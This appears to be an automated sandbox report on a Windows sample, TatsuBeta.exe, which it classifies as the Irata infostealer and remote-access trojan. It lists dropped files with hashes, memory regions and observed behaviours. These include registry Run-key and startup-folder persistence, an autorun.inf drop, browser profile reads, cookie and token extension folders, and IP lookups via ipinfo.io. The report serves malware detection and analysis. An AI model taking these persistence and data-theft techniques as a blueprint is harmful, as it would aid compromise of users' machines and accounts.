SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar

MD5 e2f4116bfdbfccefb6338144c5c5e1f1
SHA1 0258d05c9ec0d63907cab1c4f7aaa5dff867399b
SHA256 92ffc4bee3530e05a108b6fc29ead81f4f41f519458a9809aff38d878c6cfa6b
SHA512 52225740c6348d8054a63e09f09b4f6261a863aafe3b60c5467df79aaf3e64402d248a56cbac0a2e570359237f1f45e3ec5a6576d28a117b9355905ed5fe1c4f

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\swiftshader\libEGL.dll

MD5 8fa259bad2618e813e8accb125bdae9b
SHA1 3c8778144a635a6dab376626757c84fa45cedc23
SHA256 0d12034bd04a84f3f4bebe8a19c6afd083d7550147c75d9323cf5b1528ca4490
SHA512 f9554a1f4532eaa42faed8772591e2351b468d0bd8fc18d550cb3c0f0259d1fa0dfeefec4bd80d16526fb276a26b6ce77cb8523e5561471c43860bfb7837e1cb

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 3985c347d19b7b8905699b33bd5d860a
SHA1 903020094091484c067cf3df85d879df08ab4742
SHA256 d15fd50c42574486d0bedb257637bb08a819db6280a3a26b1200763de7c952e7
SHA512 38b18a0a414f6c7d9bdf8760a4d0792142c4201252efedb400a698b856625cf8ce7a3824b5c7b30e08dd88936164310dff2def9e4ef217305a8a57cf8df7d2eb

\Users\Admin\AppData\Local\Temp\nsy9B95.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 bd71f32ccc595b514dcf0b22d9ef855b
SHA1 7f4617bec6390313b6a0ce18f47dcd385a24f68e
SHA256 68910ba7087d77970ff8498e8dc756c148712b113006944059beb7da62432515
SHA512 720e5cdf3fd95985c7a7abffb43979fb8891a17196b2c83341094ede47643eaf6cb250468bc6078e05fa7f4ad289b6e32c77f93579a48634fff09dd313b848a6

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 bf163b1a8c1bc091c4af9371e5a750c0
SHA1 69c3d0cbd6e299da9dd30c81482ccbdde6bc353b
SHA256 47558d87021b1ed526dc653406b4af5496c9c6ce959d03702311e479badb5fd3
SHA512 9593794c3b6dd441e4ace8447c8c68febb007c7b54fb41485a4dd81b0f3a867c04d2e1d9a229e9bd7b759965f1fe0ff251f220d2f95b21d1c2cdea1c10aea569

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 947eef2a4ddf84d1f852ce0a0b684713
SHA1 ffabedb401156d62519c2bdc2b91487a74556f24
SHA256 e193127c7126323928a43922b729acf2e881138435ddcac00a8e0c858ff243ab
SHA512 c32c44150d69b2333ae6273c4bdb9507b9b84d98e798aa429b051b6a9831fe6d500d4084a34bd67aa590e41ff5f4cebaa39c9633dcd9e56c437e01bcae608f2b

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

MD5 bfaa9bee635d309abb9a6b42d81bf060
SHA1 e4e7b328c862782508bdf420419c2f56e93b9ce2
SHA256 6dcdae3c19afdb514ac5612a0f575bf4e0f3673c8f65e9c853a6f8b78f38b948
SHA512 1b5820d39bca5bf27800605bfa617248225965daea64f8af9fe91483d4939adcb47cc5de0308a6a1ba8fe116b3b2d95c1a15d86c724734dc8dcc205accdfae60

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\v8_context_snapshot.bin

MD5 949d4e43890879f8ceb738603a4aee67
SHA1 503d32fdbc29d23a7f655e4a8aef37c946def5bb
SHA256 5eb3e05b10af29982047e846657008c644f1db72f242f1df7f4f6c338e3c53c4
SHA512 c2494da38014ba907bd57de7fb5605b8c189d65dee5dbd6252a4931e1b479247be2e9109eda9d3c7cf657fe7174d6239b69938d1ff1316a74c1f32d759374197

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

MD5 6e82a6250603d4869e11b5f1c1468f14
SHA1 58fb16c9855b99960f3bf663db8cc1bd217cec68
SHA256 856d9d9bde75e9971766fbf09436e5270d5e05cc2c0a40b49856ce80631e8978
SHA512 87d7f4584d1a4dcf33639abd6cc8dc7c20ceb3554a9ca9039f83a55c5e37b9c0abc61e99e4fcb4cf90413b9f4af595885c82dee456187dd6f6a8a720761b66f6

\Users\Admin\AppData\Local\Temp\b3c2ea1b-5420-4510-be00-6e6babf6d4ad.tmp.node

MD5 828115f8b5c5edf6516bc9d59bc9705b
SHA1 2975c19735275accc1e5905c6a4efb64fcf70da3
SHA256 9839d95516628c22c92455560eabd3c456bb8be0843d35f033bf81cd04c68480
SHA512 78600af65572dabcddb2b7554e43cdf9e75e1e8bc8e7934263483dea1fc496653ff6e12a8bc53e9a071b00df0bac38c627390b640f3f5cb3f423a7e162aca722

\Users\Admin\AppData\Local\Temp\3c3a714a-579a-4007-8062-419c067a8c08.tmp.node

MD5 dad33a84e042b54c29e1452615da3bc1
SHA1 2eb155b6a538461218a036fbac660a17208c6d61
SHA256 8386406816c7e58e287490c69d7ede8d5b0bc1ef24feb28450aaaa5348efa49e
SHA512 073b4d3bf7671c11c490b3400f427e4511598fcd8f650af0cae1ac9e2187fc70678eee3ad2560bf053ea99979a8e8b2990bea3addd49021db908754b7aa4ea67

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

MD5 6859563bad140d91fd5667d4748cfc9b
SHA1 0493b06e0273a3e56c586f612836a99eeb16b56f
SHA256 139a28713f503fac02e5fc021ae55caab2fefca3589f37a3b75d16a99a660744
SHA512 b279b84e794c3b9aa3c1c89423e05a00e2dc0484fe6a5d5bc085b1aa9f48bbf93a93a8ceac10bb1b9760206c9c69cbe53c097927d56f73070ac93e9fab76b029

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 179bf5615266232aaaa17f0fc9eb4a29
SHA1 42e6df8efd3c8da13adaa079263ceb2acce85ccc
SHA256 a7f906e5e476b0f67395c5c4707f50a0152d759a578769b43b0f72d77ca39635
SHA512 19c2f261b34859aec7b2221e9516439fac7abafaf1d5433c12dcbe8c72940b7a0d8d9dd3ef09d26ccb79f675286e54f373db565d5ea5894a3ceede907f872fb7

memory/3056-581-0x00007FFB871F0000-0x00007FFB871F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 592a8024dd3619cd2de6dcd2fa549b22
SHA1 4ee1ad4c7b74044704cb21b8941d9511e4599143
SHA256 8d8e2ae370a9ef2d02aa701c72fcdc9f1ac4569de0d23c899b2f7133d37c1ead
SHA512 6707445afb23639eb55265dc0c6e946505547c773ca72a9aa1f8600f19bb976161135e8258b489ae1c97a91defb7880db730636794fd9bc96febc2cb2dbde2f9

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 8e3f52c533acb5a4d21cfcefc8c50a8c
SHA1 7f7fd862f35e013933be3caa83a4de267ce938f0
SHA256 c1cad31549c582118bd3a3639a6dc781df6785fb1449c3c73d6dcd6b0e7232d8
SHA512 29135c0198df1687e9564048c2af6c3841f1297e229eb1d88aa062d266a3c08313092ccfbd71b309b8d4715d188f3a42c88282406fffbf7a1bbc201e9f68e0ad

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

MD5 ef7ceabae9d8cd512a5eb85ef29056b5
SHA1 87ed611822afc67f3baf6f1c7839565eabb38402
SHA256 35a955a13aeb04fb02a56dd41f48ea567e469cc4fedb867b8c31084734cddaee
SHA512 9314277a48975ccc82861252c17252f5e587e94a64145fa78c88b0cbe597e534142562e5ed4d2e22e7e8ea2da4ca28ecd46fada71632f4299834207aae789037

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

MD5 cc9058f6b76363ac0915fed427264e82
SHA1 bc544433b3c1dcbdf3f77be7ecd4e4c0b97ef0f8
SHA256 802449ecc00738e7567ad27bb8d45325522960a7080add78837dff36c7e535ac
SHA512 cfb373d08c5bd7218a752d8c82fb494e33a507d266fa785259113f5eadca3cffc45a3d70a8ada3617f2ac6e6aa866cb63df681f561e80f457967676722de996a

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

MD5 fc8edc366259b928601b5f0ef5331175
SHA1 4758050aff7bf0be8447074665731537ce7e64b3
SHA256 fb345d3e49962e0470b96bddcb582f4e42067d7753e8866a07fffb5e11e706cb
SHA512 cd1850e0fa5068089a58d93bc7400a125083cb3f32b2f68cf83fb85739533004194471c5a190b815136ca4774d53822136132d4c03e3d4de0b3055f8dcc31289

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

MD5 a13d006359b8e6730c62ffc55b9f46a7
SHA1 df4cb808e8ecd631a2274abb124cd7c4c041526e
SHA256 2043d6c8dfd008205d011174ac99d144ca51f06715a6bf3a62e9c191b8542bfe
SHA512 7e0a30a5b5cf73cd943fa6c5183b4d8a74f86488c7eaf69d082d0b7db8a626b20f9bf44eb9c0eb47f8a04a00fbca1989705d12cf18d246ad6a1b4cdbe52b0071

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

MD5 b041e368448c1011e4b1522e167e2bb3
SHA1 bf507bdfc423e713e2c91d807ab3ac72af9ad983
SHA256 261d7c4085c9b80460ce1e4853f29dc9f1a286f38da60fd1abca9309d9e67028
SHA512 8052478f260355d032cfc9dfeb6843bab9f41cf1bf90e1c590bd25fa13f5f7d39a173c697960fa7853fbcf8ffca13b1a363f56e4a7d50146804a631d1a44a8ee

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

MD5 2d66c230adc958e2047e4dfea7f35829
SHA1 2b3d8f63f1ca704917288410cf607dbb7f8bf342
SHA256 833e38802d76aada5476c59fa1a5b8922577870727164729ae76e6a14eda22e3
SHA512 7694b442071fd392342aa4862df6afda65c038dccdcb0220d84fc12f85f9f96577c3cc9f0fc81ec38f94fad9abe00fd88bc0ea16be452e43c75a7bc94066bb01

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 85868c25d589a8d2345274aba957a228
SHA1 0be3f3a1b9a5bf8dadb91b849077cb9d32ea3629
SHA256 cd2d4c33e9a04ea76733927f0685d664dd43476b090b9b211518061a328f7c13
SHA512 3ea42014e9719bea8951f182fca0f484cb2776dc85d11995df3a69968ea5c7650eec32ee370c056ef8f76e62e3a272ec10f7030b83d4f2831b1ca7c6824a0cc3

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 45853b8af90004bee71eb01c6f05549f
SHA1 70285e2d76f4d29137b04857aa1d2671851aae49
SHA256 7cec5d03dcaee0a07cc407252022199b189450c7d181ef0a57a8076f988f992d
SHA512 15c78775adef1b071302271a0040ac521327292a849bbb24f61aea400f406af9ff9ce6ac29a1c307b9be6f3d4c645e1a07794b9436a2f6fe2ce0560a5c22f015

memory/4212-633-0x0000027545380000-0x00000275453A2000-memory.dmp

memory/4212-636-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/4212-638-0x0000027545530000-0x00000275455A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_usirkkkm.cxt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4212-639-0x000002752CC60000-0x000002752CC70000-memory.dmp

memory/4212-637-0x000002752CC60000-0x000002752CC70000-memory.dmp

memory/4212-655-0x000002752CC60000-0x000002752CC70000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5d574dc518025fad52b7886c1bff0e13
SHA1 68217a5f9e9a64ca8fed9eefa4171786a8f9f8f7
SHA256 755c4768f6e384030805284ab88689a325431667e9ab11d9aeaa55e9739742f2
SHA512 21de152e07d269b265dae58d46e8c68a3268b2f78d771d4fc44377a14e0c6e73aadae923dcfd34ce2ef53c2eaa53d4df8f281d9b8a627edee213946c9ef37d13

memory/4264-669-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/4212-660-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7b9c8059166c7c54288fb76fe3612963
SHA1 6b66d0e1f8d7606d7a6e67aeb8562011cb40fc4a
SHA256 4c3cc1da83667afcb75d0d6c96fccf58ab45b01da20f6a95b2c68b2eb48faf23
SHA512 6871685ec58f15c7211e36fdc761d69fcd872b265c9a4d430e2612cac91efc0ee7c5ac0b076d5f3d0d7cee14d948fa0e02cb121eb3135d445a26c204e3c7c6fb

memory/4264-671-0x000002AE13B30000-0x000002AE13B40000-memory.dmp

memory/4264-670-0x000002AE13B30000-0x000002AE13B40000-memory.dmp

memory/4264-690-0x000002AE13B30000-0x000002AE13B40000-memory.dmp

memory/4264-693-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/2188-708-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/2188-711-0x0000022F38EC0000-0x0000022F38ED0000-memory.dmp

memory/2188-709-0x0000022F38EC0000-0x0000022F38ED0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 06f1b4d03ce0e89abff230124eb4db85
SHA1 bbfd81c45ba8d22a0fc290af44a1aa2b73f9a367
SHA256 e739ff9804d11ae286da2a3aa5d51e91fc34542257595a513c8ad14d258e03bb
SHA512 f844b6cad026d5e3b961f53608376a75a2f2cffc3a66b5b092d427f801c94bd778d9ab59f488e9d638d7ed58dff3ca342fc69e0ee3fe3e6c8b94a3a40a1a9820

memory/2188-728-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/2188-725-0x0000022F38EC0000-0x0000022F38ED0000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\TatsuBeta.exe

MD5 35605fb754c7a70556928ad7246ca045
SHA1 fbf9ab7cbc8c88bd104bf6ff1ebd27eb30a6cd47
SHA256 aad2d58dbd5ab713403b9105e7c1771d4d173b1e399b6b0ce83baf8c1725c1ee
SHA512 44f6e168d3971ad3cc875405c80d02433e9ec17ba9e966cc11f3b95b38d38ad9e47a8cc43a3e0b6b8268255ac39b78e32f77108659f05d9f6f092761cb388aa1

memory/5684-739-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/5684-742-0x000001A7C2F00000-0x000001A7C2F10000-memory.dmp

memory/5684-741-0x000001A7C2F00000-0x000001A7C2F10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 759556f0ace90ccb0cb4bfb59269d350
SHA1 f8025b5c137847b65bf9c657378567577534733a
SHA256 81eb47906137b2465c4fcc025bbdb1b99cd1d3cb564e1a9f589f0ed199a3762d
SHA512 a44295019ad855530b28b27b1cb7d33fef96b412f9d737df505f495ce58e4c26b944cac08fc0844ab59fe3bb024e714ce470cd0bc2763b1529fd0105ad11eab5

memory/5684-762-0x000001A7C2F00000-0x000001A7C2F10000-memory.dmp

memory/5684-766-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/5684-763-0x000001A7C2F00000-0x000001A7C2F10000-memory.dmp

memory/7116-772-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/7116-775-0x00000214D5810000-0x00000214D5820000-memory.dmp

memory/7116-774-0x00000214D5810000-0x00000214D5820000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 e1ebffe51969d10ddefadf73f7de9e22
SHA1 7e78bcce2a59a325aac4de76d6a8a2b3d5e80eb8
SHA256 0ae8e6ab1be43fc9b307ce1bcb0cebf9987ee14608f05d0fd73f104cf3ee7323
SHA512 76313aed53666d72b89cafa058ecf6ff60a2a74c44dfa073ecf7a81142d09ee9cf55533ae3ad3b2b18ba5170c08565f2fa2c815d99391101f53d526eab106f49

memory/7116-795-0x00000214D5810000-0x00000214D5820000-memory.dmp

memory/7116-796-0x00000214D5810000-0x00000214D5820000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\7sk8fjhx.default-release\places.sqlite_tmp

MD5 9099f46f37a03a16a4895ce7796223de
SHA1 dd67fca23db1a41d2b6e7ab58430dfdce3ae1d95
SHA256 7733a3db3c2201bc8f1700ef75e8d9f6d95c61455d7eb82b64680673d875a1b7
SHA512 08bbcb3ff9b8c06b3c3ff4064321baa031569a19335f602d639894f016bcd49716c06edd9e7884bf47d8ab5bf5c847377711db272d5da88c6fb14eefa1b2d5f4

memory/7116-800-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/3056-848-0x0000020BC9B00000-0x0000020BC9B08000-memory.dmp

memory/7624-853-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

memory/7624-856-0x0000023A7A840000-0x0000023A7A850000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 cbdd9710957df681082aaa9bbd7e4381
SHA1 129c48fedad1ee604bcdc9af6947e12ee6cf7f77
SHA256 63e7f5ad27604fbb8a0675d8a83d13e08409ed07dca54b65d5355f0405641a7b
SHA512 2dd1715e32822e684770f6abf73a45f006ce785beedb628d15491614476f5c74da25319958fc92d6c5724a806395793890fb063880e8a8626f05b90a31529856

memory/7624-854-0x0000023A7A840000-0x0000023A7A850000-memory.dmp

memory/7624-871-0x0000023A7A840000-0x0000023A7A850000-memory.dmp

memory/7624-874-0x00007FFB6AD90000-0x00007FFB6B77C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\sysWin10Boot_0Sf6pY.vbs

MD5 81cc4206c978c02d338c5e4bd8957e05
SHA1 fcdb0b710aac4a33b303b603df91e568651f59bb
SHA256 ddb6dc7abe0dd021f677056f02f17507568bc4a49d9e770c379f5786edf447f0
SHA512 6a259f9b69f264010df9c67981d41f1df42341f7047da6428b0589b5b8ce8057c1691a03df69998bbdadc3f5c5bfebff5e1979bed8c634b1667e7102edb4d55c

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png

MD5 cf9691ba99c34d79628c457f032e7d26
SHA1 15556343430d3820c59b447e3a0dadc67df5930e
SHA256 592d07c4ea9913302437504a0ecec0cd8decfcc1c0c640f8ca848dd5709eaab3
SHA512 04f9fb7f4b8ea9ffb237f2a9b3de2eede9742335391d5d3a436139b60266cc8d8c7ca1369c4efe77226c25a6d398237233bd6c965c3440cb0fc7d9dbd58c5722

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png

MD5 bcf6ad0c75bf89a482dafaba2dba607a
SHA1 0b0a22dbbaba41913f75622fef0023f8c4e30cbe
SHA256 9446430b6a6720aa2b482c7c9519748696ba1dfb7610c499b6b9b6d4561d2ffb
SHA512 986c1b8738b57184d86038e395a90238cfa063ef8ddadefe0063599c633e8c1e1ef531e3cf78efcf67abfbd90284ca539a27d59424465ee104d57eeb8912a7e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png

MD5 192e90432fed0081abb25295d8f309c4
SHA1 5150e93061f39e26688afd60a04c0ab14b510d47
SHA256 3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2
SHA512 9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo48.png

MD5 9f74f11972c3c0b161832ffab541bf31
SHA1 e5841ba20a229cdeab85d30690509e649e848271
SHA256 8b74a0abdd566ffdf15891d6abd3537bffb0abce7f362c737c3de6752e136032
SHA512 b90f13eb65a4dcfdd596a7d9eba7c1ba5eb1a598e51107ce3dca07c0a0025469ab18c9958eff2b36f7e05a23f0d16d7d9d7c2321b8e1f2a456aaa7bec3ced0e8

C:\ProgramData\ChromeExtensionsNova\extension-tokens\manifest.json

MD5 42ac88deb5c3cfc02fdc1c27319ee067
SHA1 97b1addf35159800b90743fcfbb5505e80f6eb82
SHA256 28486361faff1827fb9f1871529c48efaaf86027592d189afa6f99b14eb3f4bb
SHA512 77c4054a3cf061eb6f4f6e9803b74833a8fb0fe352239b5b47cf39ea5eea8104b9da6deab75018557476fbda856f3be8d57e6fe2eb777c45a7a1bdb1e72d02d5

C:\ProgramData\ChromeExtensionsNova\extension-tokens\js\jquery-3.5.1.min.js

MD5 efd10caf38d5cad7b49b137db70c748d
SHA1 aa45552a2ff15ebc3c52012efa495cd6bb997234
SHA256 d5db72e4907bfa5ce24dc95f3f924d23f22f7ba8cadf81d843425bb304ab2069
SHA512 521e13bc089dc41e5bd6944e73f5c976ac04cf1416b97cf6eead6ed574c8c58153ba970f0e15236da9df0f994e3279eaabd7fe15c47c8272ccefa38389e43fb1

C:\ProgramData\ChromeExtensionsNova\extension-cookies\manifest.json

MD5 04c23766134b234e85cc537b2162efb1
SHA1 45c48d9ca30a4580a682f025cc66331e49f6f158
SHA256 f50f62683347bbca52d7f7de0c877014ae77043753905628644e2d485dfb4900
SHA512 d246f59ad6d6e9fc8d8d88129302d55cb3d2ba7d52496915ee6791fa0576153070af76ea689cc74ccefc36456df749ac5c8f45cb12702961470f202078bfcb3c

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

MD5 784d5eb047445b6a270c59f8a930b993
SHA1 f3e46b5dd0b2643c64ff90514cf654d8cbbde1ec
SHA256 7e0a28c7205bb70337e0d95dfa9d371b076c883a34a00f7576f7496fd1870af0
SHA512 b845e65fb60d2630bbb1f99cdb3f1984e5c424c5e3d48f0063adf3a237cf9d2118d2a177b687f9b9485199ceefe1eec9f165e562cfddb97492805287a66bf62a

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

MD5 b6a375102f3c0a9ca776c429dbbcc68f
SHA1 1fb6d664485047f1afdbd351861b67e71b9f9428
SHA256 eb57e50686b3094826cb100b221c6d91e84cc3e79c1f41c197fc55b23611f812
SHA512 1b82d7aa0551a3b0fcf1069ef0a48a32180ed6ccf4bba7c0f7dc0518a41ddcafaf524ce0a6832f2667aa25fde2dc5a244946bedcbcb8efbbb76ec5bb09b9b9dd

Analysis: behavioral3

Detonation Overview

Submitted

2023-12-17 13:47

Reported

2023-12-17 13:51

Platform

win10v2004-20231215-en

Max time kernel

120s

Max time network

163s

Command Line

"C:\Users\Admin\AppData\Local\Temp\TatsuBeta.exe"

Signatures

Irata

trojan infostealer rat irata

Irata payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TatsuBeta.exe C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupWJwS5S = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\TatsuBeta.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Start_WJwS5S = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_WJwS5S.vbs" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops autorun.inf file

Description Indicator Process Target
File created F:\autorun.inf C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe N/A

Enumerates physical storage devices

Collects information from the system

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
